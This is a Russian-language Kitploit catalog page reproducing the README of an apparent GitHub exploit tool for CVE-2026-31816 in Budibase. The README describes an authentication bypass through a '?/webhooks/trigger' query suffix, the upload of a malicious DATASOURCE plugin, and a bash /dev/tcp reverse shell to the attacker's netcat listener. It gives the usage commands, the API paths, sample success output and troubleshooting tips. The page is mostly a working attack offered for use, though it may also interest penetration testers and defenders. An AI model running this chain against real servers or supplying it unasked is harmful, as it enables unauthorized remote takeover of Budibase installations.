Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/imjdl/cve-2026-31816-rshell
ЭксплуатацияЭксплуатация веб-приложенийАутентификацияИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubimjdl/cve-2026-31816-rshell

CVE-2026-31816-rshell

Эксплуатирует CVE-2026-31816 в Budibase для обхода аутентификации, загрузки вредоносного плагина источника данных и выполнения reverse shell для удалённого доступа.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-31816 Reverse Shell Exploit

Обзор

Этот инструмент использует CVE-2026-31816 для установления обратного соединения (reverse shell) с целевым сервером Budibase.

Цепочка атаки: Обход аутентификации → Загрузка плагина DATASOURCE → Выполнение кода на стороне сервера → Обратная оболочка (Reverse Shell)

Требования

  • Python 3.6+
  • Библиотека requests (pip install requests)
  • Целевой сервер Budibase, уязвимый к CVE-2026-31816

Использование

Основные шаги

root@kitploit:~
# 1. Запустите слушатель на машине атакующего
nc -lvnp 4444

# 2. Запустите эксплойт (в другом терминале)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444

Параметры

ПараметрОбязательныйОписание
-t, --target✅URL целевого сервера Budibase
--lhost✅Хост слушателя (ваш IP)
--lport❌Порт слушателя (по умолчанию: 4444)

Примеры

root@kitploit:~
# IP атакующего: 192.168.1.100
# Целевой Budibase: 192.168.1.128:10000

# Терминал 1 - Запуск слушателя
nc -lvnp 4444

# Терминал 2 - Запуск эксплойта
python3 CVE-2026-31816-rshell.py \
    -t http://192.168.1.128:10000 \
    --lhost 192.168.1.100 \
    --lport 4444

Как это работает

1. Проверка уязвимости

root@kitploit:~
GET /api/integrations?/webhooks/trigger

Если возвращается 200, цель уязвима к обходу аутентификации.

2. Создание вредоносного плагина

root@kitploit:~
{
  "type": "datasource",
  "schema": { ... }
}

Плагины типа DATASOURCE выполняют JavaScript-код на сервере.

3. Полезная нагрузка обратной оболочки

root@kitploit:~
// Выполняется при проверке плагина:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

4. Загрузка и выполнение

root@kitploit:~
POST /api/plugin/upload?/webhooks/trigger

Загрузка плагина с обходом аутентификации. Код выполняется во время проверки.

Схема атаки

root@kitploit:~
┌─────────────┐     ┌─────────────┐     ┌─────────────┐
│  Attacker   │     │   Target    │     │  Listener   │
│             │     │   Server    │     │   (nc)      │
│             │     │             │     │             │
│ exploit ────┼────►│ Upload      │     │             │
│             │     │ Plugin      │     │             │
│             │     │ Execute     │────►│ Listen      │
│             │     │ Code        │◄────┤ Reverse     │
│             │     │             │     │ Connect     │
└─────────────┘     └─────────────┘     └─────────────┘

Индикатор успеха

root@kitploit:~
============================================================
CVE-2026-31816 - Reverse Shell Exploit
============================================================
[*] Target: http://192.168.1.128:10000
[*] Reverse shell: 192.168.1.100:4444

[*] Checking vulnerability...
[+] Target is vulnerable!
[*] Creating reverse shell plugin targeting 192.168.1.100:4444

[*] Uploading reverse shell plugin...
[*] Status: 200
[+] Plugin installed successfully!

============================================================
[+] SUCCESS! Check your listener!
============================================================

Устранение неполадок

В: Соединение не установлено, оболочка не получена

Возможные причины:

  1. Брандмауэр блокирует обратное соединение
  2. Целевой сервер не может связаться с IP атакующего
  3. На целевом сервере отсутствует bash

Решения:

root@kitploit:~
# Проверка сетевой связности
ping YOUR_IP

# Проверка брандмауэра
sudo ufw allow 4444/tcp

# Попробуйте другой порт
nc -lvnp 8080

В: Загрузка не удалась

Возможные причины:

  1. На цель установлен патч, закрывающий уязвимость
  2. Проблемы с сетью

Решения:

root@kitploit:~
# Проверьте вручную, существует ли уязвимость
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# Если возвращается JSON, уязвимость существует
Скачать инструмент